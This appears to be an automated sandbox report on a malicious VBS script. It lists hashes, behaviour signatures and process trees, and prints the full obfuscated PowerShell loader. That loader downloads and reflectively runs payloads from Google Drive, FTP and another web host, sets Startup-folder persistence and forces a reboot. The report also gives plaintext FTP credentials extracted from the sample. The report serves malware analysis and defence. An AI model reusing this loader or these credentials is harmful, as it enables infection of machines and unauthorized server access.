Overview

overview

10

Static

static

1

c50d459ee2...09.vbs

windows7-x64

10

c50d459ee2...09.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    94s
  • max time network
    123s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03-08-2024 02:10

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    c50d459ee28fb9d7dfaa8067855e984f19828028f56aefe8187dcd622d9c2d09.vbs

  • Size

    689KB

  • MD5

    87f27580d805863d210331653ca944a7

  • SHA1

    d861804f8fa941e95f8f779a295ffb0812ba2d4e

  • SHA256

    c50d459ee28fb9d7dfaa8067855e984f19828028f56aefe8187dcd622d9c2d09

  • SHA512

    eb895266a5774eefbc9ac6b30612a42a0d331fac221875fd9c59a67110880716ba7c7c890eb969f531dcfcff4a2c71cfdcab1c35116ec4d56de8cbf7e1a25d64

  • SSDEEP

    1536:VPPPPPPPPPPPPPPPPPPPPPPPE777777777777777777777777777777777777772:uK

Score
10/10
execution

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://drive.google.com/uc?export=download&id=

Extracted

Credentials

  • Protocol:     ftp
  • Host:
    ftp.desckvbrat.com.br
  • Port:
    21
  • Username:
    desckvbrat1
  • Password:
    developerpro21578Jp@@

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\c50d459ee28fb9d7dfaa8067855e984f19828028f56aefe8187dcd622d9c2d09.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2028
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qCybe = 'OwB9せㅚしDsせㅚしKQせㅚしgせㅚしCkせㅚしIせㅚしせㅚしnせㅚしDEせㅚしZQB1せㅚしHIせㅚしdせㅚしせㅚしnせㅚしCせㅚしせㅚしLせㅚしせㅚしgせㅚしGUせㅚしagB3せㅚしHoせㅚしaせㅚしせㅚしkせㅚしCせㅚしせㅚしLせㅚしせㅚしgせㅚしCcせㅚしaせㅚしB0せㅚしHQせㅚしcせㅚしBzせㅚしDoせㅚしLwせㅚしvせㅚしHcせㅚしdwB3せㅚしC4せㅚしbQBlせㅚしGQせㅚしaQBhせㅚしGYせㅚしaQByせㅚしGUせㅚしLgBjせㅚしG8せㅚしbQせㅚしvせㅚしGYせㅚしaQBsせㅚしGUせㅚしXwBwせㅚしHIせㅚしZQBtせㅚしGkせㅚしdQBtせㅚしC8せㅚしZwせㅚし2せㅚしG0せㅚしZQBnせㅚしGoせㅚしNwせㅚし3せㅚしGMせㅚしbQBlせㅚしHgせㅚしeせㅚしBnせㅚしDgせㅚしLwBhせㅚしGcせㅚしdQせㅚしuせㅚしHQせㅚしeせㅚしB0せㅚしC8せㅚしZgBpせㅚしGwせㅚしZQせㅚしnせㅚしCせㅚしせㅚしKせㅚしせㅚしgせㅚしF0せㅚしXQBbせㅚしHQせㅚしYwBlせㅚしGoせㅚしYgBvせㅚしFsせㅚしIせㅚしせㅚしsせㅚしCせㅚしせㅚしbせㅚしBsせㅚしHUせㅚしbgせㅚしkせㅚしCせㅚしせㅚしKせㅚしBlせㅚしGsせㅚしbwB2せㅚしG4せㅚしSQせㅚしuせㅚしCkせㅚしIせㅚしせㅚしnせㅚしEkせㅚしVgBGせㅚしHIせㅚしcせㅚしせㅚしnせㅚしCせㅚしせㅚしKせㅚしBkせㅚしG8せㅚしaせㅚしB0せㅚしGUせㅚしTQB0せㅚしGUせㅚしRwせㅚしuせㅚしCkせㅚしJwせㅚしxせㅚしHMせㅚしcwBhせㅚしGwせㅚしQwせㅚしuせㅚしDMせㅚしeQByせㅚしGEせㅚしcgBiせㅚしGkせㅚしTせㅚしBzせㅚしHMせㅚしYQBsせㅚしEMせㅚしJwせㅚしoせㅚしGUせㅚしcせㅚしB5せㅚしFQせㅚしdせㅚしBlせㅚしEcせㅚしLgせㅚしpせㅚしCせㅚしせㅚしeせㅚしBtせㅚしHoせㅚしWせㅚしB4せㅚしCQせㅚしIせㅚしせㅚしoせㅚしGQせㅚしYQBvせㅚしEwせㅚしLgBuせㅚしGkせㅚしYQBtせㅚしG8せㅚしRせㅚしB0せㅚしG4せㅚしZQByせㅚしHIせㅚしdQBDせㅚしDoせㅚしOgBdせㅚしG4せㅚしaQBhせㅚしG0せㅚしbwBEせㅚしHせㅚしせㅚしcせㅚしBBせㅚしC4せㅚしbQBlせㅚしHQせㅚしcwB5せㅚしFMせㅚしWwせㅚし7せㅚしCkせㅚしIせㅚしせㅚしpせㅚしCせㅚしせㅚしJwBBせㅚしCcせㅚしIせㅚしせㅚしsせㅚしCせㅚしせㅚしJwCTIToせㅚしkyEnせㅚしCせㅚしせㅚしKせㅚしBlせㅚしGMせㅚしYQBsせㅚしHせㅚしせㅚしZQBSせㅚしC4せㅚしbgBaせㅚしHcせㅚしQQBHせㅚしCQせㅚしIせㅚしせㅚしoせㅚしGcせㅚしbgBpせㅚしHIせㅚしdせㅚしBTせㅚしDQせㅚしNgBlせㅚしHMせㅚしYQBCせㅚしG0せㅚしbwByせㅚしEYせㅚしOgせㅚし6せㅚしF0せㅚしdせㅚしByせㅚしGUせㅚしdgBuせㅚしG8せㅚしQwせㅚしuせㅚしG0せㅚしZQB0せㅚしHMせㅚしeQBTせㅚしFsせㅚしIせㅚしせㅚし9せㅚしCせㅚしせㅚしeせㅚしBtせㅚしHoせㅚしWせㅚしB4せㅚしCQせㅚしIせㅚしBdせㅚしF0せㅚしWwBlせㅚしHQせㅚしeQBCせㅚしFsせㅚしOwせㅚしnせㅚしCUせㅚしSQBoせㅚしHEせㅚしUgBYせㅚしCUせㅚしJwせㅚしgせㅚしD0せㅚしIせㅚしBlせㅚしGoせㅚしdwB6せㅚしGgせㅚしJせㅚしせㅚし7せㅚしCkせㅚしIせㅚしBuせㅚしFoせㅚしdwBBせㅚしEcせㅚしJせㅚしせㅚしgせㅚしCgせㅚしZwBuせㅚしGkせㅚしcgB0せㅚしFMせㅚしZせㅚしBhせㅚしG8せㅚしbせㅚしBuせㅚしHcせㅚしbwBEせㅚしC4せㅚしUQBYせㅚしGEせㅚしUwBDせㅚしCQせㅚしIせㅚしせㅚし9せㅚしCせㅚしせㅚしbgBaせㅚしHcせㅚしQQBHせㅚしCQせㅚしOwせㅚし4せㅚしEYせㅚしVせㅚしBVせㅚしDoせㅚしOgBdせㅚしGcせㅚしbgBpせㅚしGQせㅚしbwBjせㅚしG4せㅚしRQせㅚしuせㅚしHQせㅚしeせㅚしBlせㅚしFQせㅚしLgBtせㅚしGUせㅚしdせㅚしBzせㅚしHkせㅚしUwBbせㅚしCせㅚしせㅚしPQせㅚしgせㅚしGcせㅚしbgBpせㅚしGQせㅚしbwBjせㅚしG4せㅚしRQせㅚしuせㅚしFEせㅚしWせㅚしBhせㅚしFMせㅚしQwせㅚしkせㅚしDsせㅚしKQB0せㅚしG4せㅚしZQBpせㅚしGwせㅚしQwBiせㅚしGUせㅚしVwせㅚしuせㅚしHQせㅚしZQBOせㅚしCせㅚしせㅚしdせㅚしBjせㅚしGUせㅚしagBiせㅚしE8せㅚしLQB3せㅚしGUせㅚしTgせㅚしoせㅚしCせㅚしせㅚしPQせㅚしgせㅚしFEせㅚしWせㅚしBhせㅚしFMせㅚしQwせㅚしkせㅚしDsせㅚしKQせㅚしoせㅚしGUせㅚしcwBvせㅚしHせㅚしせㅚしcwBpせㅚしGQせㅚしLgBRせㅚしFgせㅚしYQBTせㅚしEMせㅚしJせㅚしせㅚし7せㅚしCkせㅚしIせㅚしせㅚしnせㅚしHQせㅚしeせㅚしB0せㅚしC4せㅚしMQせㅚしwせㅚしEwせㅚしTせㅚしBEせㅚしC8せㅚしMQせㅚしwせㅚしC8せㅚしcgBlせㅚしHQせㅚしcせㅚしB5せㅚしHIせㅚしYwBwせㅚしFUせㅚしLwByせㅚしGIせㅚしLgBtせㅚしG8せㅚしYwせㅚしuせㅚしHQせㅚしYQByせㅚしGIせㅚしdgBrせㅚしGMせㅚしcwBlせㅚしGQせㅚしLgBwせㅚしHQせㅚしZgBせㅚしせㅚしDEせㅚしdせㅚしBhせㅚしHIせㅚしYgB2せㅚしGsせㅚしYwBzせㅚしGUせㅚしZせㅚしせㅚしvせㅚしC8せㅚしOgBwせㅚしHQせㅚしZgせㅚしnせㅚしCせㅚしせㅚしKせㅚしBnせㅚしG4せㅚしaQByせㅚしHQせㅚしUwBkせㅚしGEせㅚしbwBsせㅚしG4せㅚしdwBvせㅚしEQせㅚしLgBRせㅚしFgせㅚしYQBTせㅚしEMせㅚしJせㅚしせㅚしgせㅚしD0せㅚしIせㅚしBuせㅚしFoせㅚしdwBBせㅚしEcせㅚしJせㅚしせㅚし7せㅚしCkせㅚしJwBせㅚしせㅚしEせㅚしせㅚしcせㅚしBKせㅚしDgせㅚしNwせㅚし1せㅚしDEせㅚしMgBvせㅚしHIせㅚしcせㅚしByせㅚしGUせㅚしcせㅚしBvせㅚしGwせㅚしZQB2せㅚしGUせㅚしZせㅚしせㅚしnせㅚしCwせㅚしJwせㅚしxせㅚしHQせㅚしYQByせㅚしGIせㅚしdgBrせㅚしGMせㅚしcwBlせㅚしGQせㅚしJwせㅚしoせㅚしGwせㅚしYQBpせㅚしHQせㅚしbgBlせㅚしGQせㅚしZQByせㅚしEMせㅚしawByせㅚしG8せㅚしdwB0せㅚしGUせㅚしTgせㅚしuせㅚしHQせㅚしZQBOせㅚしC4せㅚしbQBlせㅚしHQせㅚしcwB5せㅚしFMせㅚしIせㅚしB0せㅚしGMせㅚしZQBqせㅚしGIせㅚしbwせㅚしtせㅚしHcせㅚしZQBuせㅚしCせㅚしせㅚしPQせㅚしgせㅚしHMせㅚしbせㅚしBhせㅚしGkせㅚしdせㅚしBuせㅚしGUせㅚしZせㅚしBlせㅚしHIせㅚしQwせㅚしuせㅚしFEせㅚしWせㅚしBhせㅚしFMせㅚしQwせㅚしkせㅚしDsせㅚしOせㅚしBGせㅚしFQせㅚしVQせㅚし6せㅚしDoせㅚしXQBnせㅚしG4せㅚしaQBkせㅚしG8せㅚしYwBuせㅚしEUせㅚしLgB0せㅚしHgせㅚしZQBUせㅚしC4せㅚしbQBlせㅚしHQせㅚしcwB5せㅚしFMせㅚしWwせㅚしgせㅚしD0せㅚしIせㅚしBnせㅚしG4せㅚしaQBkせㅚしG8せㅚしYwBuせㅚしEUせㅚしLgBRせㅚしFgせㅚしYQBTせㅚしEMせㅚしJせㅚしせㅚし7せㅚしCkせㅚしdせㅚしBuせㅚしGUせㅚしaQBsせㅚしEMせㅚしYgBlせㅚしFcせㅚしLgB0せㅚしGUせㅚしTgせㅚしgせㅚしHQせㅚしYwBlせㅚしGoせㅚしYgBPせㅚしC0せㅚしdwBlせㅚしE4せㅚしKせㅚしせㅚしgせㅚしD0せㅚしIせㅚしBRせㅚしFgせㅚしYQBTせㅚしEMせㅚしJせㅚしせㅚし7せㅚしG4せㅚしWgB3せㅚしEEせㅚしRwせㅚしkせㅚしDsせㅚしMgせㅚしxせㅚしHMせㅚしbせㅚしBUせㅚしDoせㅚしOgBdせㅚしGUせㅚしcせㅚしB5せㅚしFQせㅚしbせㅚしBvせㅚしGMせㅚしbwB0せㅚしG8せㅚしcgBQせㅚしHkせㅚしdせㅚしBpせㅚしHIせㅚしdQBjせㅚしGUせㅚしUwせㅚしuせㅚしHQせㅚしZQBOせㅚしC4せㅚしbQBlせㅚしHQせㅚしcwB5せㅚしFMせㅚしWwせㅚしgせㅚしD0せㅚしIせㅚしBsせㅚしG8せㅚしYwBvせㅚしHQせㅚしbwByせㅚしFせㅚしせㅚしeQB0せㅚしGkせㅚしcgB1せㅚしGMせㅚしZQBTせㅚしDoせㅚしOgBdせㅚしHIせㅚしZQBnせㅚしGEせㅚしbgBhせㅚしE0せㅚしdせㅚしBuせㅚしGkせㅚしbwBQせㅚしGUせㅚしYwBpせㅚしHYせㅚしcgBlせㅚしFMせㅚしLgB0せㅚしGUせㅚしTgせㅚしuせㅚしG0せㅚしZQB0せㅚしHMせㅚしeQBTせㅚしFsせㅚしOwB9せㅚしGUせㅚしdQByせㅚしHQせㅚしJせㅚしB7せㅚしCせㅚしせㅚしPQせㅚしgせㅚしGsせㅚしYwBhせㅚしGIせㅚしbせㅚしBsせㅚしGEせㅚしQwBuせㅚしG8せㅚしaQB0せㅚしGEせㅚしZせㅚしBpせㅚしGwせㅚしYQBWせㅚしGUせㅚしdせㅚしBhせㅚしGMせㅚしaQBmせㅚしGkせㅚしdせㅚしByせㅚしGUせㅚしQwByせㅚしGUせㅚしdgByせㅚしGUせㅚしUwせㅚし6せㅚしDoせㅚしXQByせㅚしGUせㅚしZwBhせㅚしG4せㅚしYQBNせㅚしHQせㅚしbgBpせㅚしG8せㅚしUせㅚしBlせㅚしGMせㅚしaQB2せㅚしHIせㅚしZQBTせㅚしC4せㅚしdせㅚしBlせㅚしE4せㅚしLgBtせㅚしGUせㅚしdせㅚしBzせㅚしHkせㅚしUwBbせㅚしHsせㅚしIせㅚしBlせㅚしHMせㅚしbせㅚしBlせㅚしH0せㅚしIせㅚしBmせㅚしC8せㅚしIせㅚしせㅚしwせㅚしCせㅚしせㅚしdせㅚしせㅚしvせㅚしCせㅚしせㅚしcgせㅚしvせㅚしCせㅚしせㅚしZQB4せㅚしGUせㅚしLgBuせㅚしHcせㅚしbwBkせㅚしHQせㅚしdQBoせㅚしHMせㅚしIせㅚしせㅚし7せㅚしCcせㅚしMせㅚしせㅚし4せㅚしDEせㅚしIせㅚしBwせㅚしGUせㅚしZQBsせㅚしHMせㅚしJwせㅚしgせㅚしGQせㅚしbgBhせㅚしG0せㅚしbQBvせㅚしGMせㅚしLQせㅚしgせㅚしGUせㅚしeせㅚしBlせㅚしC4せㅚしbせㅚしBsせㅚしGUせㅚしaせㅚしBzせㅚしHIせㅚしZQB3せㅚしG8せㅚしcせㅚしせㅚし7せㅚしCせㅚしせㅚしZQBjせㅚしHIせㅚしbwBmせㅚしC0せㅚしIせㅚしせㅚしpせㅚしCせㅚしせㅚしJwBwせㅚしHUせㅚしdせㅚしByせㅚしGEせㅚしdせㅚしBTせㅚしFwせㅚしcwBtせㅚしGEせㅚしcgBnせㅚしG8せㅚしcgBQせㅚしFwせㅚしdQBuせㅚしGUせㅚしTQせㅚしgせㅚしHQせㅚしcgBhせㅚしHQせㅚしUwBcせㅚしHMせㅚしdwBvせㅚしGQせㅚしbgBpせㅚしFcせㅚしXせㅚしB0せㅚしGYせㅚしbwBzせㅚしG8せㅚしcgBjせㅚしGkせㅚしTQBcせㅚしGcせㅚしbgBpせㅚしG0せㅚしYQBvせㅚしFIせㅚしXせㅚしBhせㅚしHQせㅚしYQBEせㅚしHせㅚしせㅚしcせㅚしBBせㅚしFwせㅚしJwせㅚしgせㅚしCsせㅚしIせㅚしBwせㅚしHUせㅚしdせㅚしByせㅚしGEせㅚしdせㅚしBTせㅚしGQせㅚしbせㅚしBvせㅚしEYせㅚしJせㅚしせㅚしgせㅚしCgせㅚしIせㅚしBuせㅚしG8せㅚしaQB0せㅚしGEせㅚしbgBpせㅚしHQせㅚしcwBlせㅚしEQせㅚしLQせㅚしgせㅚしCcせㅚしJQBJせㅚしGgせㅚしcQBSせㅚしFgせㅚしJQせㅚしnせㅚしCせㅚしせㅚしbQBlせㅚしHQせㅚしSQせㅚしtせㅚしHkせㅚしcせㅚしBvせㅚしEMせㅚしIせㅚしせㅚし7せㅚしCせㅚしせㅚしdせㅚしByせㅚしGEせㅚしdせㅚしBzせㅚしGUせㅚしcgBvせㅚしG4せㅚしLwせㅚしgせㅚしHQせㅚしZQBpせㅚしHUせㅚしcQせㅚしvせㅚしCせㅚしせㅚしZQBsせㅚしGkせㅚしZgせㅚしkせㅚしCせㅚしせㅚしZQB4せㅚしGUせㅚしLgBhせㅚしHMせㅚしdQB3せㅚしCせㅚしせㅚしZQB4せㅚしGUせㅚしLgBsせㅚしGwせㅚしZQBoせㅚしHMせㅚしcgBlせㅚしHcせㅚしbwBwせㅚしCせㅚしせㅚしOwせㅚしpせㅚしCcせㅚしdQBzせㅚしG0せㅚしLgBuせㅚしGkせㅚしdwBwせㅚしFUせㅚしXせㅚしせㅚしnせㅚしCせㅚしせㅚしKwせㅚしgせㅚしGEせㅚしdせㅚしBzせㅚしGEせㅚしcせㅚしせㅚしkせㅚしCgせㅚしIせㅚしせㅚし9せㅚしCせㅚしせㅚしZQBsせㅚしGkせㅚしZgせㅚしkせㅚしDsせㅚしKQせㅚしgせㅚしGUせㅚしbQBhせㅚしE4せㅚしcgBlせㅚしHMせㅚしVQせㅚし6せㅚしDoせㅚしXQB0せㅚしG4せㅚしZQBtせㅚしG4せㅚしbwByせㅚしGkせㅚしdgBuせㅚしEUせㅚしWwせㅚしgせㅚしCsせㅚしIせㅚしせㅚしnせㅚしFwせㅚしcwByせㅚしGUせㅚしcwBVせㅚしFwせㅚしOgBDせㅚしCcせㅚしKせㅚしせㅚしgせㅚしD0せㅚしIせㅚしBwせㅚしHUせㅚしdせㅚしByせㅚしGEせㅚしdせㅚしBTせㅚしGQせㅚしbせㅚしBvせㅚしEYせㅚしJせㅚしせㅚし7せㅚしCkせㅚしJwB1せㅚしHMせㅚしbQせㅚしuせㅚしG4せㅚしaQB3せㅚしHせㅚしせㅚしVQBcせㅚしCcせㅚしIせㅚしせㅚしrせㅚしCせㅚしせㅚしYQB0せㅚしHMせㅚしYQBwせㅚしCQせㅚしIせㅚしせㅚしsせㅚしEIせㅚしSwBMせㅚしFIせㅚしVQせㅚしkせㅚしCgせㅚしZQBsせㅚしGkせㅚしRgBkせㅚしGEせㅚしbwBsせㅚしG4せㅚしdwBvせㅚしEQせㅚしLgBwせㅚしFkせㅚしUwB3せㅚしGYせㅚしJせㅚしせㅚし7せㅚしDgせㅚしRgBUせㅚしFUせㅚしOgせㅚし6せㅚしF0せㅚしZwBuせㅚしGkせㅚしZせㅚしBvせㅚしGMせㅚしbgBFせㅚしC4せㅚしdせㅚしB4せㅚしGUせㅚしVせㅚしせㅚしuせㅚしG0せㅚしZQB0せㅚしHMせㅚしeQBTせㅚしFsせㅚしIせㅚしせㅚし9せㅚしCせㅚしせㅚしZwBuせㅚしGkせㅚしZせㅚしBvせㅚしGMせㅚしbgBFせㅚしC4せㅚしcせㅚしBZせㅚしFMせㅚしdwBmせㅚしCQせㅚしOwせㅚしpせㅚしHQせㅚしbgBlせㅚしGkせㅚしbせㅚしBDせㅚしGIせㅚしZQBXせㅚしC4せㅚしdせㅚしBlせㅚしE4せㅚしIせㅚしB0せㅚしGMせㅚしZQBqせㅚしGIせㅚしTwせㅚしtせㅚしHcせㅚしZQBOせㅚしCgせㅚしIせㅚしせㅚし9せㅚしCせㅚしせㅚしcせㅚしBZせㅚしFMせㅚしdwBmせㅚしCQせㅚしOwB9せㅚしDsせㅚしIせㅚしせㅚしpせㅚしCcせㅚしcgBnせㅚしDgせㅚしRせㅚしせㅚし3せㅚしG8せㅚしUgBzせㅚしGYせㅚしVgBjせㅚしHIせㅚしMgBuせㅚしEEせㅚしaせㅚしBmせㅚしGgせㅚしVgせㅚし2せㅚしEQせㅚしQwB4せㅚしFIせㅚしcQBuせㅚしHEせㅚしagせㅚし1せㅚしGoせㅚしcgBiせㅚしDEせㅚしJwせㅚしgせㅚしCsせㅚしIせㅚしBwせㅚしEgせㅚしQQBTせㅚしGgせㅚしJせㅚしせㅚしoせㅚしCせㅚしせㅚしPQせㅚしgせㅚしHせㅚしせㅚしSせㅚしBBせㅚしFMせㅚしaせㅚしせㅚしkせㅚしHsせㅚしIせㅚしBlせㅚしHMせㅚしbせㅚしBlせㅚしH0せㅚしOwせㅚしgせㅚしCkせㅚしJwB4せㅚしDQせㅚしZgBoせㅚしFoせㅚしTQB3せㅚしE4せㅚしNwBVせㅚしGUせㅚしXwせㅚしwせㅚしF8せㅚしNQBfせㅚしGkせㅚしYwBzせㅚしGIせㅚしaせㅚしせㅚし3せㅚしEMせㅚしUせㅚしせㅚしwせㅚしEkせㅚしZgBQせㅚしGQせㅚしQQせㅚしyせㅚしDEせㅚしMQせㅚしnせㅚしCせㅚしせㅚしKwせㅚしgせㅚしHせㅚしせㅚしSせㅚしBBAFMAaAAkACgAIAA9ACAAcABIAEEAUwBoACQAewAgACkAdgBmAFkAVABIACQAKAAgAGYAaQA7ACAAKQAnADQANgAnACgAcwBuAGkAYQB0AG4AbwBDAC4ARQBSAFUAVABDAEUAVABJAEgAQwBSAEEAXwBSAE8AUwBTAEUAQwBPAFIAUAA6AHYAbgBlACQAIAA9ACAAdgBmAFkAVABIACQAOwAnAD0AZABpACYAZABhAG8AbABuAHcAbwBkAD0AdAByAG8AcAB4AGUAPwBjAHUALwBtAG8AYwAuAGUAbABnAG8AbwBnAC4AZQB2AGkAcgBkAC8ALwA6AHMAcAB0AHQAaAAnACAAPQAgAHAASABBAFMAaAAkADsAKQAnAHUAcwBtAC4AbgBpAHcAcABVAFwAJwAgACsAIABhAHQAcwBhAHAAJAAoACAAbABlAGQAOwApACgAaAB0AGEAUABwAG0AZQBUAHQAZQBHADoAOgBdAGgAdABhAFAALgBPAEkALgBtAGUAdABzAHkAUwBbACAAPQAgAGEAdABzAGEAcAAkAHsAIAApAGIASgBHAHAAUgAkACgAIABmAGkAOwAgACkAMgAoAHMAbABhAHUAcQBFAC4AcgBvAGoAYQBNAC4AbgBvAGkAcwByAGUAVgAuAHQAcwBvAGgAJAAgAD0AIABiAEoARwBwAFIAJAAgADsA';$ziISm = $qCybe.replace('せㅚし' , 'A') ;$bQOzu = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $ziISm ) ); $bQOzu = $bQOzu[-1..-$bQOzu.Length] -join '';$bQOzu = $bQOzu.replace('%XRqhI%','C:\Users\Admin\AppData\Local\Temp\c50d459ee28fb9d7dfaa8067855e984f19828028f56aefe8187dcd622d9c2d09.vbs');powershell $bQOzu
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:924
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $RpGJb = $host.Version.Major.Equals(2) ;if ($RpGJb) {$pasta = [System.IO.Path]::GetTempPath();del ($pasta + '\Upwin.msu');$hSAHp = 'https://drive.google.com/uc?export=download&id=';$HTYfv = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ($HTYfv) {$hSAHp = ($hSAHp + '112AdPfI0PC7hbsci_5_0_eU7NwMZhf4x') ;}else {$hSAHp = ($hSAHp + '1brj5jqnqRxCD6VhfhAn2rcVfsRo7D8gr') ;};$fwSYp = (New-Object Net.WebClient);$fwSYp.Encoding = [System.Text.Encoding]::UTF8;$fwSYp.DownloadFile($URLKB, $pasta + '\Upwin.msu');$FoldStartup = ('C:\Users\' + [Environment]::UserName );$file = ($pasta + '\Upwin.msu'); powershell.exe wusa.exe $file /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\c50d459ee28fb9d7dfaa8067855e984f19828028f56aefe8187dcd622d9c2d09.vbs' -Destination ( $FoldStartup + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$GAwZn;$CSaXQ = (New-Object Net.WebClient);$CSaXQ.Encoding = [System.Text.Encoding]::UTF8;$CSaXQ.Credentials = new-object System.Net.NetworkCredential('desckvbrat1','developerpro21578Jp@@');$GAwZn = $CSaXQ.DownloadString( 'ftp://[email protected]/Upcrypter/01/DLL01.txt' );$CSaXQ.dispose();$CSaXQ = (New-Object Net.WebClient);$CSaXQ.Encoding = [System.Text.Encoding]::UTF8;$GAwZn = $CSaXQ.DownloadString( $GAwZn );$hzwje = 'C:\Users\Admin\AppData\Local\Temp\c50d459ee28fb9d7dfaa8067855e984f19828028f56aefe8187dcd622d9c2d09.vbs';[Byte[]] $xXzmx = [System.Convert]::FromBase64String( $GAwZn.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $xXzmx ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'elif/txt.uga/8gxxemc77jgem6g/muimerp_elif/moc.erifaidem.www//:sptth' , $hzwje , 'true1' ) );};"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4604

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    948B

    MD5

    c1a54dd5a1ab44cc4c4afd42f291c863

    SHA1

    b77043ab3582680fc96192e9d333a6be0ae0f69d

    SHA256

    c6dce870a896f3531ae7a10a0c2096d2eb7eb5989ae783aefea6150279502d75

    SHA512

    010f5093f58b0393d17c824a357513cf4f06239ccddd86c2e0581347ef3b8e7b93f869b0770bdaeb000e4fda7e14f49b9e45663a3839ab049446e9fe08ec535d

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_r2nagrpm.0ft.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • memory/924-0-0x00007FF81F363000-0x00007FF81F365000-memory.dmp

    Filesize

    8KB

    Download

  • memory/924-1-0x000001BD61BD0000-0x000001BD61BF2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/924-11-0x00007FF81F360000-0x00007FF81FE21000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/924-12-0x00007FF81F360000-0x00007FF81FE21000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/924-25-0x00007FF81F360000-0x00007FF81FE21000-memory.dmp

    Filesize

    10.8MB

    Download